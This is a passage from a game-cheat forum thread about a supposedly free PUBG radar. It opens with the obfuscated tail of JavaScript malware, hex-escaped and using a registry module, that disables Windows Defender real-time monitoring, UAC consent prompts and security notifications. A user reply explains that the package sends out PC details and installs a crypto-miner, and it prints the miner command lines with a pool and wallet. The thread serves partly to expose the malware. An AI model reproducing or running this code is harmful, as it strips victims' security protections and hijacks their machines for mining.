"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72\x5C\x52\x65\x61\x6C\x2D\x54\x69\x6D\x65\x20\x50\x72\x6F\x74\x65\x63\x74\x69\x6F\x6E": {
"\x44\x69\x73\x61\x62\x6C\x65\x52\x65\x61\x6C\x74\x69\x6D\x65\x4D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x53\x79\x73\x74\x65\x6D": {
"\x43\x6F\x6E\x73\x65\x6E\x74\x50\x72\x6F\x6D\x70\x74\x42\x65\x68\x61\x76\x69\x6F\x72\x41\x64\x6D\x69\x6E": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x53\x79\x73\x74\x65\x6D": {
"\x43\x6F\x6E\x73\x65\x6E\x74\x50\x72\x6F\x6D\x70\x74\x42\x65\x68\x61\x76\x69\x6F\x72\x55\x73\x65\x72": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['createKey'](['HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'], function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x43\x55\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x4E\x6F\x74\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x73\x5C\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x57\x69\x6E\x64\x6F\x77\x73\x2E\x53\x79\x73\x74\x65\x6D\x54\x6F\x61\x73\x74\x2E\x53\x65\x63\x75\x72\x69\x74\x79\x41\x6E\x64\x4D\x61\x69\x6E\x74\x65\x6E\x61\x6E\x63\x65": {
"\x45\x6E\x61\x62\x6C\x65\x64": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
checkgpu()
})
})
})
})
})
})
})
})
})
|
|
|
|
|
03/12/2018, 05:00
|
#719
|
elite*gold: 0
Join Date: Oct 2012
Posts: 155
Received Thanks: 30
|
I'm not code savvy, simplify it for me?
|
|
|
|
|
03/12/2018, 05:20
|
#720
|
elite*gold: 0
Join Date: Mar 2018
Posts: 10
Received Thanks: 11
|
Quote:
Originally Posted by Nightzfury
I'm not code savvy, simplify it for me?
|
simplify its disabling windows defender, add scheduled task for hide and run node js with javascript, thats uploads information about your PC (os, serial, pcname and others) on a malicious site, downloads a miner depending on the GPU and launching it 
mining process thats need to run (AMD):
servicehost.exe -epool stratum+tcp://lb.geo.pirlpool.eu:8002 -ewal 0x3c7c0c1ABbC596ae6E8A6a4f75Ee45D06110c70d -epsw x -allpools 1 -allcoins exp -gser 2 -eworker a0 -li 25 -dbg -1
nvidia:
servicehost.exe -epool stratum+tcp://lb.geo.pirlpool.eu:8002 -ewal 0x3c7c0c1ABbC596ae6E8A6a4f75Ee45D06110c70d -epsw x -allpools 1 -allcoins exp -gser 2 -eworker n1 -li 25 -dbg -1
|
|
|
|
Similar Threads
|
Where to get PUBG RADAR (Packet-Based) for free?
03/13/2018 - PlayerUnknown's Battlegrounds - 9 Replies
I see lots of people selling the packet-based radar for free everywhere for 50+ dollars or more, then people get upset and say "shitty seller, selling something you can get for free"
So.... where can I get it for free then... I really would like it!
|
All times are GMT +1. The time now is 13:16.
|
|
![[FREE] PUBG RADAR undetected packet sniffer](https://www.elitepvpers.com/forum/iconimages/playerunknowns-battlegrounds/free-pubg-radar-undetected-packet-sniffer_ltr.gif){kind=small}
